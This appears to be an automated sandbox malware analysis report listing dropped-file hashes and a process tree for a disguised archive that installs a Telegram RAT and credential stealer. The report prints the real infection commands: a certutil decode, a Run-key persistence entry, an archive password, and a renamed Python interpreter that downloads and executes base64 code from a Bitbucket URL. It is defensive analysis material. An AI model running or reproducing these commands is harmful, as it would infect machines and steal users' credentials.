                                                                                                                                                                                      MD5:CC33265A265DF9A1F966BAD6F64C8A13
                                                                                                                                                                                      SHA1:C97640FA78986503DECEF07476BEE7BB19D5D541
                                                                                                                                                                                      SHA-256:4E6759FF4301EFFA31C4C7A61AAB0DE57DD2403A88E6D6EC48EA14F4A03397D1
                                                                                                                                                                                      SHA-512:FEFDB1062ADF56713DA36D93283D52F84BA058488EA80D565CF553DAAAF38190A5DB72F65CD48AA36F99DBC090290EF831E25A84267B83979DE7B9AFD87F4BDF
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:PK..........*YKv.<.....d......vcruntime140.dll...X......,...=***..5..>.:... ......A .....c..s...^.Mbn.k6c..A....%.D.1!I.`$.0*:.9.=.h.{.......hMwU.:u..S...d+%.(J..f..=...E.......{.S...f....o&,..+U....,.\.^.YXX..g.K.Bu^.z..D.....Y....E..UaK...N.JZ...E....H...../..0.<]..'U.G...G..HxJ..Q.\.w/..z../q.^.y....LM.0H2x.).8!l..B'..K)....).) ..&J_..?..I".E.<.G.m...@Q.......H.&..a..... ..(j'0j1u.?~R.......?..^....S$.*V.3..Z6++...G].C..ng(..yV....E.0..]pQ.JJKV`.eB.I.rI?p..E+(Rv................m>(.3.~.....3..........?*.)..df.i..u0....O9.H...6..?T8.DE.....H.B........<........."z.........O.y.C.y...(.Y.?.....<.D.c....b..?..`9..=.".?...?...._X6..?f.Q....)....4...3...j7..?M.S..........GZ.E......v.Cf.O.y.S......#r.'..OX....i...EDz...gd..........9.4..2.f.....W..O@...i...6+.....Zb...5.RA....UI.....)Tg.].].....L.S...^q/8.5;......bEvi.zu^QA&&S.T....-^<O..e....0....,u..YW......Q.....L...(........$;3.......ZW..*oE..R..=.Q*..g.eR.T.5.ZE....x/.....*...-.B..[../.|...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      No static file info
                                                                                                                                                                                      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                      Start time:09:05:51
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                      Start time:09:05:52
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,15826648908994825402,11418272317416250006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                      Start time:09:05:53
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/SjDNX"
                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                      Start time:09:06:17
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                      Imagebase:0x7ff62cab0000
                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                      Start time:09:06:38
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\" -spe -an -ai#7zMap20132:206:7zEvent12301
                                                                                                                                                                                      Imagebase:0x670000
                                                                                                                                                                                      File size:700'416 bytes
                                                                                                                                                                                      MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:6'365'288 bytes
                                                                                                                                                                                      MD5 hash:4864A55CFF27F686023456A22371E790
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat"
                                                                                                                                                                                      Imagebase:0xf20000
                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"
                                                                                                                                                                                      Imagebase:0xf20000
                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25l
                                                                                                                                                                                      Imagebase:0x7ff62d140000
                                                                                                                                                                                      File size:644'184 bytes
                                                                                                                                                                                      MD5 hash:01F28B85ABF1993B7B14B3D15346F2E8
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                      Start time:09:06:44
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"
                                                                                                                                                                                      Imagebase:0x7ff7203f0000
                                                                                                                                                                                      File size:5'641'176 bytes
                                                                                                                                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                      Start time:09:06:46
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                      Imagebase:0x7ff6118a0000
                                                                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                      Start time:09:06:51
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1600,i,3555974175840820386,6288481564636944147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                      Imagebase:0x7ff6118a0000
                                                                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                      Start time:09:06:53
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                      Imagebase:0x7ff6118a0000
                                                                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                      Start time:09:06:53
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1616,i,10171936117906713763,8070250402194629303,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                      Imagebase:0x7ff6118a0000
                                                                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                      Start time:09:06:59
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
                                                                                                                                                                                      Imagebase:0xf60000
                                                                                                                                                                                      File size:1'277'440 bytes
                                                                                                                                                                                      MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                      Start time:09:06:59
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
                                                                                                                                                                                      Imagebase:0xd60000
                                                                                                                                                                                      File size:59'392 bytes
                                                                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                      Start time:09:06:59
                                                                                                                                                                                      Start date:12/11/2024
                                                                                                                                                                                      Path:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"
                                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                                      File size:100'120 bytes
                                                                                                                                                                                      MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_Braodo, Description: Yara detected Braodo, Source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      No disassembly